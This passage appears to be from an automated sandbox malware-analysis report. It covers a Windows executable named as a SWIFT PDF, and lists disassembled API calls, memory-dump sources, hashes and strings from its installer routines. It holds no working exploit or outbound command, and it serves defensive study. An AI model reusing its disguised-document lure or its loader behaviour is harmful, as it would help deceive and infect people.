                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4227406936-0
                                                                                                                                    • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                    • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                    • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                    • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                    • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                                                    • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                    • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                    • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                                                    • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                    • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                    • String ID: -B@$Call$N$open
                                                                                                                                    • API String ID: 3615053054-1446803726
                                                                                                                                    • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                    • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                    • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                    APIs
                                                                                                                                    • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                    • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                    • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                    • API String ID: 222337774-899692902
                                                                                                                                    • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                    • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                    • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                    • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                    APIs
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                      • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                    • String ID: @Hmu
                                                                                                                                    • API String ID: 4216380887-887474944
                                                                                                                                    • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                    • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                                    • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                    • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                    • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                    • CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                                    • "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe", xrefs: 0040632D
                                                                                                                                    • *?|<>/":, xrefs: 0040633B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 589700163-351585049
                                                                                                                                    • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                    • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                    • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                    • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                    • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                    • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                    • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                    • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                    • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                    • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                    • MulDiv.KERNEL32(000763D1,00000064,000763D5), ref: 00402D4D
                                                                                                                                    • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                    Strings
                                                                                                                                    • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                    Memory Dump Source
